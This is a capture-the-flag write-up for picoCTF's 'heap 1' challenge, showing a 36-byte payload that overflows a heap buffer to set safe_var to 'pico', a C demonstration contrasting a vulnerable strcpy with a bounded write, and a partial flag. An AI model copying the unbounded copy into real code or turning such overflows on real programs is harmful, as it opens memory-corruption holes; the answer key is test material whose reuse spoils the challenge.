heap 1

Published: April 3, 2024
Updated: December 9, 2025

Description

Can you control your overflow?

Remote only

Connect to the remote instance at tethys.picoctf.net <PORT_FROM_INSTANCE>.

Explore the menu options; they mirror heap0 (print/write/inspect safe_var/print flag).

nc tethys.picoctf.net <PORT_FROM_INSTANCE>

Solution

This builds on heap 0 by requiring a specific string instead of just zeroing. After mastering this, progress to heap 2 for function pointer overwrites and heap 3 for use-after-free exploitation.
  1. Step 1: Write up to the boundary
    The buffer still sits 32 bytes before safe_var. Write exactly 32 filler characters (e.g., A) so the next four bytes overwrite safe_var itself.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  2. Step 2: Append the magic string
    Append pico immediately after the 32-byte filler when using menu option 2. The null terminator follows pico, leaving safe_var == "pico".
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico
  3. Step 3: Print the flag
    Once safe_var contains pico, selecting option 4 prints the flag without further tricks.
    Use option 3 first if you want to confirm safe_var now shows pico, then call option 4.
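As an added illustration that is not part of the original writeup, the C model below reproduces the layout the three steps rely on (a 32-byte buffer immediately followed by safe_var) and runs the same payload through an unbounded write and a bounded one. The single backing array standing in for the two heap chunks and the starting contents of safe_var are constructed assumptions; the page gives neither.

```c
#include <stdio.h>
#include <string.h>
/* Constructed model of the heap 1 layout described above: a 32-byte input
 * buffer followed directly by safe_var. One backing array stands in for the
 * two adjacent heap chunks so the demonstration is deterministic. */
#define BUF_SIZE 32
#define REGION_SIZE 64
struct heap_region { char bytes[REGION_SIZE]; };
#define INPUT(r)    ((r)->bytes)             /* user buffer at offset 0 */
#define SAFE_VAR(r) ((r)->bytes + BUF_SIZE)  /* safe_var at offset 32 */

static void init_region(struct heap_region *r) {
    memset(r->bytes, 0, REGION_SIZE);
    /* safe_var's starting contents are assumed; the page only says "pico" wins. */
    strcpy(SAFE_VAR(r), "init");
}

/* Vulnerable write path: unbounded copy, the defect the challenge exercises. */
static void write_unbounded(struct heap_region *r, const char *input) {
    strcpy(INPUT(r), input);  /* bytes 33 onward land in safe_var */
}

/* Hardened write path: refuse input that does not fit, so safe_var is never reached. */
static int write_bounded(struct heap_region *r, const char *input) {
    size_t len = strlen(input);
    if (len >= BUF_SIZE) return -1;
    memcpy(INPUT(r), input, len + 1);
    return 0;
}

/* The option-4 check: does safe_var hold exactly "pico"? */
static int check_win(const struct heap_region *r) {
    return strcmp(SAFE_VAR(r), "pico") == 0;
}

/* Send the page's payload (32 x 'A' + "pico") through one write path.
 * Returns 1 if the flag check would pass afterwards, 0 otherwise. */
static int run_payload(int bounded) {
    struct heap_region r;
    const char *payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico";
    init_region(&r);
    if (bounded) write_bounded(&r, payload);   /* rejected: returns -1, writes nothing */
    else write_unbounded(&r, payload);
    return check_win(&r);
}

int main(void) {
    printf("unbounded write: win=%d\n", run_payload(0));  /* 1 */
    printf("bounded write:   win=%d\n", run_payload(1));  /* 0 */
    return 0;
}
```

The 36-byte payload spills exactly four bytes plus the terminator past the buffer, which is why safe_var reads "pico" afterwards; the bounded path shows that a length check before the copy is all it takes to close the hole.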

Flag

picoCTF{starting_to_get_the_hang_c58...}

As soon as safe_var == pico, option 4 prints the flag shown above.